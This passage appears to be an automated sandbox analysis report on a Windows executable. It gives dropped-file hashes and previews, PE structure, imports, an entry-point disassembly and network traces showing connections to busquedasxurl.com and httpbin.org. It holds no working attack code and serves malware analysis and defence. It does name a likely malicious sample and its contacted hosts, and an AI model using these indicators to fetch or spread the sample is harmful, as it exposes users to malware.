                                                                                                                                                                                                                                                                        SHA-256:B70D69D25204381F19378E1BB35CC2B8C8430AA80A983F8D0E8E837050BB06EF
                                                                                                                                                                                                                                                                        SHA-512:A63BED03F05396B967858902E922B2FBFB4CF517712F91CFAA096FF0539CF300D6B9C659FFEE6BF11C28E79E23115FD6B9C0B1AA95DB1CBD4843487F060CCF40
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........I^.f'..f'..f'......f'...&..f'...#..f'...$..f'.o.&..f'..."..f'...&..f'..f&..g'.o....f'.o.'..f'.o.%..f'.Rich.f'.................PE..d......d.........." .........................................................P............`..........................................................0..\....................@..$....v..T............................<..8............0..........@....................text...$........................... ..`.rdata......0......................@..@.data...x(......."..................@....pdata..............................@..@.rsrc...\....0......................@..@.reloc..$....@......................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\MkWMm5piE5.exe
                                                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):123904
                                                                                                                                                                                                                                                                        Entropy (8bit):5.966619585818369
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:07jbPA0SD9S3vrCqf93qMHxCjdLZn1Ya:07jtS9SfuCRCjFV
                                                                                                                                                                                                                                                                        MD5:47C91C74BB2C5CF696626AF04F3705AB
                                                                                                                                                                                                                                                                        SHA1:C086BC2825969756169FAB7DD2E560D360E1E09C
                                                                                                                                                                                                                                                                        SHA-256:F6EAD250FC2DE4330BD26079A44DED7F55172E05A70E28AD85D09E7881725155
                                                                                                                                                                                                                                                                        SHA-512:E6B6A4425B3E30CEA7BF8B09971FA0C84D6317B1A37BC1518266DC8D72C166099A8FC40A9B985300901BD921E444FF438FD30B814C1F1C6A051DF3471615C2BD
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........U...U...U...\.v.S.......Q.......E.......].......V.....Q...A...R...U........\.....T.....T...RichU...........PE..d......d.........." ................(........................................ ............`..........................................o..................d.......................H....G..T............................H..8............................................text...~........................... ..`.rdata..............................@..@.data....-.......(..................@....pdata..............................@..@.rsrc...d...........................@..@.reloc..H...........................@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):60
                                                                                                                                                                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                                        Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                                        File Type:PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                                                        Size (bytes):208764
                                                                                                                                                                                                                                                                        Entropy (8bit):7.8832299901971234
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3072:JfEtQ539B6GDX4jTJ7oeigTgJhR7D/LCHjJrADCAcNcj2noNtnXgaQRuF3DNkf8P:D3r6GD4fJ73xTg8ODCAPrnD0uF24
                                                                                                                                                                                                                                                                        MD5:E7ED7467E81479CD7C1B60CDAB161FDE
                                                                                                                                                                                                                                                                        SHA1:80E238F0877B696B8C03E3F086360CF638184AC6
                                                                                                                                                                                                                                                                        SHA-256:6EDD0DDC616A5502D61876A3BF3A788534C85703744370A0C5EC201B038B0F65
                                                                                                                                                                                                                                                                        SHA-512:E0BF042A9E0B13E3D7942D0A072D13AB5D7CAC5362787636A27F5D04B3868E1D546892CBDF88D6312720EBB63B940EA212419BFE875B217DBEB41E6E0EF65290
                                                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                                                        Preview:.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^..w.m.u..3s3..s.z.,J..z....-.....d.D..9..@\"1...#@.tA.D r`...L.@.s"y.s...@.......=....f....V}..W..}......[.._K........;.Z...^.../.Sg..)...2.o.N.d...I/w..,2V..5JfbO....Ox)...b..b.@..K....:.i1vlL.....yn..Z..@..-..I.(..cGN.....e....a.4}..5.C....C.N....I..'.....Y..|.....P......i}..<....$._z.'c_..~....S`...5.}......)..gE./.b.sS..._.d.`.3.W|.....c...i........O..v....d.c1c..73.w..^.t@l.G..9.+V.....M_c...=..#w6..~.$.........4.#w.y....nwd.>|{n...r...?.`..............i.....f...w.........j.k....%....6.E..3-......4...2.....~n......oI.?d9;Y~/v...ps.............'..C..,.. .v.N..E......,.v.y.om}].c<n....>.>6f.-!..1.....a<...m}}...uMl....;...........[^..[\.....l}mfl.kR{......Z...*......m._KK....]........X.y[....[\.a..u...7.yC..M..ov...=.0..5.2.....&v..W..........5..7....s.a......b-..Mm.&6...[..-o.+..Fv]..S. .<0.h3......[.^...\..Z._.c.....s....oc....b...
                                                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\MkWMm5piE5.exe
                                                                                                                                                                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                        Category:modified
                                                                                                                                                                                                                                                                        Size (bytes):4
                                                                                                                                                                                                                                                                        Entropy (8bit):2.0
                                                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                                                        SSDEEP:3:qn:qn
                                                                                                                                                                                                                                                                        MD5:3F1D1D8D87177D3D8D897D7E421F84D6
                                                                                                                                                                                                                                                                        SHA1:DD082D742A5CB751290F1DB2BD519C286AA86D95
                                                                                                                                                                                                                                                                        SHA-256:F02285FB90ED8C81531FE78CF4E2ABB68A62BE73EE7D317623E2C3E3AEFDFFF2
                                                                                                                                                                                                                                                                        SHA-512:2AE2B3936F31756332CA7A4B877D18F3FCC50E41E9472B5CD45A70BEA82E29A0FA956EE6A9EE0E02F23D9DB56B41D19CB51D88AAC06E9C923A820A21023752A9
                                                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                                                        Preview:blat
                                                                                                                                                                                                                                                                        File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                        Entropy (8bit):7.982294171465986
                                                                                                                                                                                                                                                                        TrID:
                                                                                                                                                                                                                                                                        • Win64 Executable GUI (202006/5) 77.37%
                                                                                                                                                                                                                                                                        • InstallShield setup (43055/19) 16.49%
                                                                                                                                                                                                                                                                        • Win64 Executable (generic) (12005/4) 4.60%
                                                                                                                                                                                                                                                                        • Generic Win/DOS Executable (2004/3) 0.77%
                                                                                                                                                                                                                                                                        • DOS Executable Generic (2002/1) 0.77%
                                                                                                                                                                                                                                                                        File name:MkWMm5piE5.exe
                                                                                                                                                                                                                                                                        File size:17'155'097 bytes
                                                                                                                                                                                                                                                                        MD5:05d551d9e91e59cfa28c7d7b2a5e2374
                                                                                                                                                                                                                                                                        SHA1:b9d58e533693c1936dc515d9c0400ca36dc0c049
                                                                                                                                                                                                                                                                        SHA256:2daa3a1b14af19d4daf3a60a493d2613b87eba00e13b21e1b12dcea681b3dc80
                                                                                                                                                                                                                                                                        SHA512:6d17f061a889fb92a6b65f7387713248a4f543c8a3c1fd9c7b57ebd05fe78bc2f6a977819632a9a0e0d1a79f7451f084cf71db3a3d5dbc44296c68f71bcb9161
                                                                                                                                                                                                                                                                        SSDEEP:393216:6EkMDVntpUTLfhJsW+eGQRCMTozGxu8C0ibfz6e57c1c0XiWCN:6UDlHUTLJSW+e5RLoztZ026e5SuVN
                                                                                                                                                                                                                                                                        TLSH:C9072391361851C6F6BDC432B10BE13166687CB79B62A13E71B6E36609E33510D2FE3E
                                                                                                                                                                                                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................
                                                                                                                                                                                                                                                                        Icon Hash:6c0c0666465b5bb6
                                                                                                                                                                                                                                                                        Entrypoint:0x14000c1f0
                                                                                                                                                                                                                                                                        Entrypoint Section:.text
                                                                                                                                                                                                                                                                        Digitally signed:false
                                                                                                                                                                                                                                                                        Imagebase:0x140000000
                                                                                                                                                                                                                                                                        Subsystem:windows gui
                                                                                                                                                                                                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                                        Time Stamp:0x65B45843 [Sat Jan 27 01:11:31 2024 UTC]
                                                                                                                                                                                                                                                                        TLS Callbacks:
                                                                                                                                                                                                                                                                        CLR (.Net) Version:
                                                                                                                                                                                                                                                                        OS Version Major:5
                                                                                                                                                                                                                                                                        OS Version Minor:2
                                                                                                                                                                                                                                                                        File Version Major:5
                                                                                                                                                                                                                                                                        File Version Minor:2
                                                                                                                                                                                                                                                                        Subsystem Version Major:5
                                                                                                                                                                                                                                                                        Subsystem Version Minor:2
                                                                                                                                                                                                                                                                        Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                                                                                                                        Instruction
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                                                        call 00007F0B1113F9CCh
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                                                        jmp 00007F0B1113F5DFh
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        sub esp, 28h
                                                                                                                                                                                                                                                                        call 00007F0B1113FF44h
                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                        je 00007F0B1113F783h
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                                        jmp 00007F0B1113F767h
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        cmp ecx, eax
                                                                                                                                                                                                                                                                        je 00007F0B1113F776h
                                                                                                                                                                                                                                                                        xor eax, eax
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        cmpxchg dword ptr [0003427Ch], ecx
                                                                                                                                                                                                                                                                        jne 00007F0B1113F750h
                                                                                                                                                                                                                                                                        xor al, al
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        add esp, 28h
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        mov al, 01h
                                                                                                                                                                                                                                                                        jmp 00007F0B1113F759h
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                                                                        movzx eax, byte ptr [00034267h]
                                                                                                                                                                                                                                                                        test ecx, ecx
                                                                                                                                                                                                                                                                        mov ebx, 00000001h
                                                                                                                                                                                                                                                                        cmove eax, ebx
                                                                                                                                                                                                                                                                        mov byte ptr [00034257h], al
                                                                                                                                                                                                                                                                        call 00007F0B1113FD43h
                                                                                                                                                                                                                                                                        call 00007F0B11140E62h
                                                                                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                                                                                        jne 00007F0B1113F766h
                                                                                                                                                                                                                                                                        xor al, al
                                                                                                                                                                                                                                                                        jmp 00007F0B1113F776h
                                                                                                                                                                                                                                                                        call 00007F0B1114DE01h
                                                                                                                                                                                                                                                                        test al, al
                                                                                                                                                                                                                                                                        jne 00007F0B1113F76Bh
                                                                                                                                                                                                                                                                        xor ecx, ecx
                                                                                                                                                                                                                                                                        call 00007F0B11140E72h
                                                                                                                                                                                                                                                                        jmp 00007F0B1113F74Ch
                                                                                                                                                                                                                                                                        mov al, bl
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        add esp, 20h
                                                                                                                                                                                                                                                                        pop ebx
                                                                                                                                                                                                                                                                        ret
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        int3
                                                                                                                                                                                                                                                                        inc eax
                                                                                                                                                                                                                                                                        push ebx
                                                                                                                                                                                                                                                                        dec eax
                                                                                                                                                                                                                                                                        sub esp, 20h
                                                                                                                                                                                                                                                                        cmp byte ptr [0003421Ch], 00000000h
                                                                                                                                                                                                                                                                        mov ebx, ecx
                                                                                                                                                                                                                                                                        jne 00007F0B1113F7C9h
                                                                                                                                                                                                                                                                        cmp ecx, 01h
                                                                                                                                                                                                                                                                        jnbe 00007F0B1113F7CCh
                                                                                                                                                                                                                                                                        call 00007F0B1113FEAAh
                                                                                                                                                                                                                                                                        test eax, eax
                                                                                                                                                                                                                                                                        je 00007F0B1113F78Ah
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x3cdcc0x78.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x896c0.rsrc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22a4.pdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0xd00000x75c.reloc
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x3a3300x1c.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a1f00x140.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                                        .text0x10000x29c900x29e0062616acf257019688180f494b4eb78d4False0.5523087686567164data6.4831047330596565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rdata0x2b0000x12bf40x12c001e9740a59f029cb6742aad64a6a1e5acFalse0.5184375data5.835006666762151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .data0x3e0000x33380xe0099d84572872f2ce8d9bdbc2521e1966eFalse0.1328125Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8271683819747706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                                        .pdata0x420000x22a40x240039f0a7d8241a665fc55289b5f9977819False0.4720052083333333data5.316391891279308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        _RDATA0x450000x15c0x200624222957a635749731104f8cdf6f9b7False0.38671875data2.83326547900447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .rsrc0x460000x896c00x89800b55f6f17155d765db323eef7bdbca050False0.11222833806818182data5.920015077844823IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        .reloc0xd00000x75c0x8004138d4447f190c2657ec208ef31be551False0.5458984375data5.240127521097618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                                        RT_ICON0x464480xa068Device independent bitmap graphic, 256 x 512 x 4, image size 327680.1660091564387298
                                                                                                                                                                                                                                                                        RT_ICON0x504b00x668Device independent bitmap graphic, 48 x 96 x 4, image size 11520.2890243902439024
                                                                                                                                                                                                                                                                        RT_ICON0x50b180x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 5120.3709677419354839
                                                                                                                                                                                                                                                                        RT_ICON0x50e000x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 2880.430327868852459
                                                                                                                                                                                                                                                                        RT_ICON0x50fe80x128Device independent bitmap graphic, 16 x 32 x 4, image size 1280.46959459459459457
                                                                                                                                                                                                                                                                        RT_ICON0x511100x12428Device independent bitmap graphic, 256 x 512 x 8, image size 65536, 256 important colors0.11998609476949407
                                                                                                                                                                                                                                                                        RT_ICON0x635380xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colors0.2593283582089552
                                                                                                                                                                                                                                                                        RT_ICON0x643e00x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors0.3046028880866426
                                                                                                                                                                                                                                                                        RT_ICON0x64c880x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors0.3323732718894009
                                                                                                                                                                                                                                                                        RT_ICON0x653500x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colors0.2861271676300578
                                                                                                                                                                                                                                                                        RT_ICON0x658b80x42028Device independent bitmap graphic, 256 x 512 x 32, image size 2703360.05777509838151315
                                                                                                                                                                                                                                                                        RT_ICON0xa78e00x10828Device independent bitmap graphic, 128 x 256 x 32, image size 675840.10018632438187626
                                                                                                                                                                                                                                                                        RT_ICON0xb81080x94a8Device independent bitmap graphic, 96 x 192 x 32, image size 380160.17765923901618666
                                                                                                                                                                                                                                                                        RT_ICON0xc15b00x5488Device independent bitmap graphic, 72 x 144 x 32, image size 216000.21035120147874306
                                                                                                                                                                                                                                                                        RT_ICON0xc6a380x4228Device independent bitmap graphic, 64 x 128 x 32, image size 168960.18469532357109117
                                                                                                                                                                                                                                                                        RT_ICON0xcac600x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 96000.3046680497925311
                                                                                                                                                                                                                                                                        RT_ICON0xcd2080x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 42240.3808630393996248
                                                                                                                                                                                                                                                                        RT_ICON0xce2b00x988Device independent bitmap graphic, 24 x 48 x 32, image size 24000.5151639344262295
                                                                                                                                                                                                                                                                        RT_ICON0xcec380x468Device independent bitmap graphic, 16 x 32 x 32, image size 10880.6622340425531915
                                                                                                                                                                                                                                                                        RT_GROUP_ICON0xcf0a00x110data0.5919117647058824
                                                                                                                                                                                                                                                                        RT_MANIFEST0xcf1b00x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                                        DLLImport
                                                                                                                                                                                                                                                                        USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                                        COMCTL32.dll
                                                                                                                                                                                                                                                                        KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                                                                        ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                                        GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.562927961 CET49729443192.168.2.1182.180.136.22
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.562968016 CET4434972982.180.136.22192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.563514948 CET49729443192.168.2.1182.180.136.22
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:34.156550884 CET49729443192.168.2.1182.180.136.22
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:34.156588078 CET4434972982.180.136.22192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.190624952 CET4434972982.180.136.22192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.190732002 CET49729443192.168.2.1182.180.136.22
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.190948963 CET49729443192.168.2.1182.180.136.22
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.190960884 CET4434972982.180.136.22192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.639082909 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.639116049 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.639178038 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.979274988 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.979295969 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.712369919 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.717611074 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.717628956 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.718770027 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.718869925 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.720655918 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.720848083 CET4434983844.196.3.45192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.720909119 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:20.720909119 CET49838443192.168.2.1144.196.3.45
                                                                                                                                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.422405958 CET6266453192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.559350967 CET53626641.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.339406013 CET6445753192.168.2.111.1.1.1
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.637696028 CET53644571.1.1.1192.168.2.11
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.422405958 CET192.168.2.111.1.1.10x9224Standard query (0)busquedasxurl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.339406013 CET192.168.2.111.1.1.10xd30aStandard query (0)httpbin.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:57:31.559350967 CET1.1.1.1192.168.2.110x9224No error (0)busquedasxurl.com82.180.136.22A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                        Dec 9, 2024 09:58:18.637696028 CET1.1.1.1192.168.2.110xd30aNo error (0)httpbin.org44.196.3.45A (IP address)IN (0x0001)false
